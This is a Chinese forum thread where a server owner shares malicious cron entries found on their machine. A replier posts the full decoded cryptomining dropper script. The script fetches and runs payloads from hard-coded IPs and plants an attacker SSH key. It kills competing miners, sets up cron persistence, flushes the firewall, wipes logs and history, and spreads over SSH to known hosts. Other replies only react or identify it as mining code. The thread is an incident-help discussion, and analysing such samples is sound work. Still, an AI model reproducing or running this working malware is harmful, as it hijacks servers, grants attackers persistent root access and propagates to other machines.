大佬们好，今天发现服务器特别卡顿，发现这两句代码。请大佬教育教育这种坏人

b_d

*/30 * * * *    (curl -s http://122.51.164.83:7770/ash.sh||wget -q -O - http://122.51.164.83:7770/ash.sh)|bash -sh
##
* * * * * wget -q -O - http://185.92.74.42/s.sh | sh > /dev/null 2>&1

JuncoJet

楼主注意下 /root/.ssh/authorized_keys

JuncoJet

解压出来完整代码是这个

[Bash shell] 纯文本查看 复制代码

LOCKFILE=/tmp/aslift.file
if [ -e ${LOCKFILE} ] && kill -0 `cat ${LOCKFILE}`; then
    echo "already running"
    exit
fi
trap "rm -f ${LOCKFILE}; exit" INT TERM EXIT
echo $$ > ${LOCKFILE}
uname -a
id
hostname
setenforce 0 2>/dev/null
ulimit -n 50000
ulimit -u 50000
rtdir="/etc/sysupdates"
rtdira="/etc/wgeta"
rtdirb="/etc/wgetb"
notls_x86="http://103.85.84.57:20331/notls_x86"
notls_x86_64="http://103.85.84.57:20331/notls_x86"
notls_xxxx="http://103.85.84.57:20331/Linux-syn25000"
crontab -r 2>/dev/null
rm -rf /var/spool/cron/* 2>/dev/null
mkdir -p /var/spool/cron/crontabs 2>/dev/null
mkdir -p /root/.ssh 2>/dev/null
echo 'ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAtK7bwC0UwEw8Jq9YycNtQ+cfoIc2jlYLQMzoUSMM0Ck49I7+M9iAc1wpW8/qUWJPA79oXU8ko890PZcRemvgkiwOFtAtCMWO9o3ZSo0Kc23v1ZGte3z5emZLBJGV8uEENa01hq3fdvD5xF24N0Uaxia+9jrxeKVkBllrlmupPZoMwhBTx+if8N6Nrt69NF4kEZdr0mXv45HHwV2zoAXQ7yb6iEVtpme/x5V6trbd2nQRla3wO4iPcaHO7zFW4qOAo4nCPL7wyKGYrlFHdOYOGvQizqnlEldy7Uxb+R+CqEiJ2UN+1XW2iK2MRheQzMGC12ueX76XJ6aBJoqdWWG2uQ== root@VM_0_14_centos' > /root/.ssh/authorized_keys
kill_miner_proc()
{
    ps auxf|grep -v grep|grep "mine.moneropool.com"|awk '{print $2}'|xargs kill -9
    ps auxf|grep -v grep|grep "pool.t00ls.ru"|awk '{print $2}'|xargs kill -9
    ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:8080"|awk '{print $2}'|xargs kill -9
    ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:3333"|awk '{print $2}'|xargs kill -9
    ps auxf|grep -v grep|grep "zhuabcn@yahoo.com"|awk '{print $2}'|xargs kill -9
    ps auxf|grep -v grep|grep "monerohash.com"|awk '{print $2}'|xargs kill -9
    ps auxf|grep -v grep|grep "/tmp/a7b104c270"|awk '{print $2}'|xargs kill -9
    ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:6666"|awk '{print $2}'|xargs kill -9
    ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:7777"|awk '{print $2}'|xargs kill -9
    ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:443"|awk '{print $2}'|xargs kill -9
    ps auxf|grep -v grep|grep "stratum.f2pool.com:8888"|awk '{print $2}'|xargs kill -9
    ps auxf|grep -v grep|grep "xmrpool.eu" | awk '{print $2}'|xargs kill -9
    ps auxf|grep xiaoyao| awk '{print $2}'|xargs kill -9
    ps auxf|grep xiaoxue| awk '{print $2}'|xargs kill -9
    ps ax|grep var|grep lib|grep jenkins|grep -v httpPort|grep -v headless|grep "\-c"|xargs kill -9
    ps ax|grep -o './[0-9]* -c'| xargs pkill -f
    pkill -f biosetjenkins
    pkill -f Loopback
    pkill -f apaceha
    pkill -f cryptonight
    pkill -f stratum
    pkill -f mixnerdx
    pkill -f performedl
    pkill -f JnKihGjn
    pkill -f irqba2anc1
    pkill -f irqba5xnc1
    pkill -f irqbnc1
    pkill -f ir29xc1
    pkill -f conns
    pkill -f irqbalance
    pkill -f crypto-pool
    pkill -f minexmr
    pkill -f XJnRj
    pkill -f mgwsl
    pkill -f pythno
    pkill -f jweri
    pkill -f lx26
    pkill -f NXLAi
    pkill -f BI5zj
    pkill -f askdljlqw
    pkill -f minerd
    pkill -f minergate
    pkill -f Guard.sh
    pkill -f ysaydh
    pkill -f bonns
    pkill -f donns
    pkill -f kxjd
    pkill -f Duck.sh
    pkill -f bonn.sh
    pkill -f conn.sh
    pkill -f kworker34
    pkill -f kw.sh
    pkill -f pro.sh
    pkill -f polkitd
    pkill -f acpid
    pkill -f icb5o
    pkill -f nopxi
    pkill -f irqbalanc1
    pkill -f minerd
    pkill -f i586
    pkill -f gddr
    pkill -f mstxmr
    pkill -f ddg.2011
    pkill -f wnTKYg
    pkill -f deamon
    pkill -f disk_genius
    pkill -f sourplum
    pkill -f polkitd
    pkill -f nanoWatch
    pkill -f zigw
    pkill -f devtool
    pkill -f systemctI
    pkill -f WmiPrwSe
}

downloads()
{
    if [ -f "/usr/bin/curl" ]
    then 
	echo $1,$2
        http_code=`curl -I -m 10 -o /dev/null -s -w %{http_code} $1`
        if [ "$http_code" -eq "200" ]
        then
            curl --connect-timeout 10 --retry 100 $1 > $2
        elif [ "$http_code" -eq "405" ]
        then
            curl --connect-timeout 10 --retry 100 $1 > $2
        else
            curl --connect-timeout 10 --retry 100 $3 > $2
        fi
    elif [ -f "/usr/bin/cur" ]
    then
        http_code = `cur -I -m 10 -o /dev/null -s -w %{http_code} $1`
        if [ "$http_code" -eq "200" ]
        then
            cur --connect-timeout 10 --retry 100 $1 > $2
        elif [ "$http_code" -eq "405" ]
        then
            cur --connect-timeout 10 --retry 100 $1 > $2
        else
            cur --connect-timeout 10 --retry 100 $3 > $2
        fi
    elif [ -f "/usr/bin/wget" ]
    then
        wget --timeout=10 --tries=100 -O $2 $1
        if [ $? -ne 0 ]
	then
		wget --timeout=10 --tries=100 -O $2 $3
        fi
    elif [ -f "/usr/bin/wge" ]
    then
        wge --timeout=10 --tries=100 -O $2 $1
        if [ $? -eq 0 ]
        then
            wge --timeout=10 --tries=100 -O $2 $3
        fi
    fi
}

kill_sus_proc()
{
    ps axf -o "pid"|while read procid
    do
            ls -l /proc/$procid/exe | grep /tmp
            if [ $? -ne 1 ]
            then
                    cat /proc/$procid/cmdline| grep -a -E "axlist|axlistc"
                    if [ $? -ne 0 ]
                    then
                            kill -9 $procid
                    else
                            echo "don't kill"
                    fi
            fi
    done
    ps axf -o "pid %cpu" | awk '{if($2>=40.0) print $1}' | while read procid
    do
            cat /proc/$procid/cmdline| grep -a -E "axlist|axlistc"
            if [ $? -ne 0 ]
            then
                    kill -9 $procid
            else
                    echo "don't kill"
            fi
    done
}

kill_miner_proc
kill_sus_proc


ps -fe|grep axlist |grep -v grep
if [ $? -ne 0 ]; then
	DIR=$(mktemp -d)
	sleep 1s
	downloads $notls_x86 $DIR/axlist
	echo "not tmp runing"
	cd $DIR
	chmod 777 $DIR/axlist
	sleep 5s
	nohup $DIR/axlist &
	chmod 777 $DIR/axlist
	chattr +i $DIR/axlist
else
	echo "tmp runing....."
fi


NTOK=$(netstat --version 2>/dev/null|wc -l)
if [ ${NTOK} -eq 0 ]; then NETTOOL='ss '; else NETTOOL='netstat '; fi
port=$(${NETTOOL} -an 2>/dev/null| grep :6389 | wc -l)
self=$(ps aux|grep -v grep|grep -v defunct|grep "axlist"|wc -l)
if [ ${self} -gt 1 ]; then
	ps ax|grep -v grep|grep -v defunct|grep "axlist"|awk 'NR >= 2'| while read pid _; do kill -9 "$pid" >/dev/null 2>&1; done
fi

echo -e "*/10 * * * * root (curl -s [url]http://122.51.164.83:7770/ash.sh[/url]||wget -q -O - [url]http://122.51.164.83:7770/ash.sh[/url])|bash -sh\n##" > /etc/cron.d/root
echo -e "*/20 * * * * root (curl -s [url]http://122.51.164.83:7770/ash.sh[/url]||wget -q -O - [url]http://122.51.164.83:7770/ash.sh[/url])|bash -sh\n##" > /etc/cron.d/apache
echo -e "*/30 * * * *	(curl -s [url]http://122.51.164.83:7770/ash.sh[/url]||wget -q -O - [url]http://122.51.164.83:7770/ash.sh[/url])|bash -sh\n##" > /var/spool/cron/root
mkdir -p /var/spool/cron/crontabs
echo -e "* * * * *	(curl -s [url]http://122.51.164.83:7770/ash.sh[/url]||wget -q -O - [url]http://122.51.164.83:7770/ash.sh[/url])|bash -sh\n##" > /var/spool/cron/crontabs/root
mkdir -p /etc/cron.hourly
(curl -fsSL --connect-timeout 120 [url]http://122.51.164.83:7770/11[/url] -o /etc/cron.hourly/oanacroner1||[url]http://122.51.164.83:7770/11[/url] -O /etc/cron.hourly/oanacroner1) && chmod 755 /etc/cron.hourly/oanacroner1
if crontab -l | grep -q "122.51.164.83"
then
    echo "Cron exists"
else
    crontab -r
    echo "Cron not found"
    LDR="wget -q -O -"
    if [ -s /usr/bin/curl ];
    then
        LDR="curl";
    fi
    if [ -s /usr/bin/wget ];
    then
        LDR="wget -q -O -";
    fi
	(crontab -l 2>/dev/null; echo "*/15 * * * * $LDR [url]http://122.51.164.83:7770/ash.sh[/url] | bash -sh > /dev/null 2>&1")| crontab -
fi
iptables -F
iptables -X
iptables -A OUTPUT -p tcp --dport 3333 -j DROP
iptables -A OUTPUT -p tcp --dport 5555 -j DROP
iptables -A OUTPUT -p tcp --dport 7777 -j DROP
iptables -A OUTPUT -p tcp --dport 9999 -j DROP
iptables -I INPUT -s 43.245.222.57 -j DROP
service iptables reload
ps auxf|grep -v grep|grep "stratum"|awk '{print $2}'|xargs kill -9
history -c
echo > /var/spool/mail/root
echo > /var/log/wtmp
echo > /var/log/secure
echo > /root/.bash_history
yum install -y bash 2>/dev/null
apt install -y bash 2>/dev/null
apt-get install -y bash 2>/dev/null
if [ -f /root/.ssh/known_hosts ] && [ -f /root/.ssh/id_rsa.pub ]; then
  for h in $(grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" /root/.ssh/known_hosts); do ssh -oBatchMode=yes -oConnectTimeout=5 -oStrictHostKeyChecking=no $h '(curl -fsSL [url]http://122.51.164.83:7770/ash.sh[/url]||wget -q -O- [url]http://122.51.164.83:7770/ash.sh[/url])|bash -sh >/dev/null 2>&1 &' & done
fi
if [ -f /root/.ssh/known_hosts ] && [ -f /root/.ssh/id_rsa.pub ]; then
  for h in $(grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" /root/.ssh/known_hosts); do ssh -oBatchMode=yes -oConnectTimeout=5 -oStrictHostKeyChecking=no $h '(curl -fsSL [url]http://122.51.164.83:7770/ash.sh[/url]||wget -q -O- [url]http://122.51.164.83:7770/ash.sh[/url])|bash -sh >/dev/null 2>&1 &' & done
fi
for file in /home/*
do
    if test -d $file
    then
        if [ -f $file/.ssh/known_hosts ] && [ -f $file/.ssh/id_rsa.pub ]; then
            for h in $(grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" $file/.ssh/known_hosts); do ssh -oBatchMode=yes -oConnectTimeout=5 -oStrictHostKeyChecking=no $h '(curl -fsSL [url]http://122.51.164.83:7770/ash.sh[/url]||wget -q -O- [url]http://122.51.164.83:7770/ash.sh[/url])|bash -sh >/dev/null 2>&1 &' & done
        fi
    fi
done
bash -c 'curl -fsSL 122.51.164.83:7770/bsh.sh|bash' 2>/dev/null

zwqlon1978

小白路过看不懂

JuncoJet

好像是个gzip的压缩包吧

fjf3997

看不懂耶~~~~

b_d

潇湘公子 发表于 2019-12-5 10:55
腾讯云前不久也在不断提示我    我看服务器也有类似的 情况  腾讯云很多都被爆了吗、、、

最好还是定期检查下服务器。

b_d

fjf3997 发表于 2019-12-5 11:07
看不懂耶~~~~

俺也一样

RemMai

服务器被植入了挖矿代码.
xmr.crypto-pool.fr:7777 进入并且翻译,就知道了....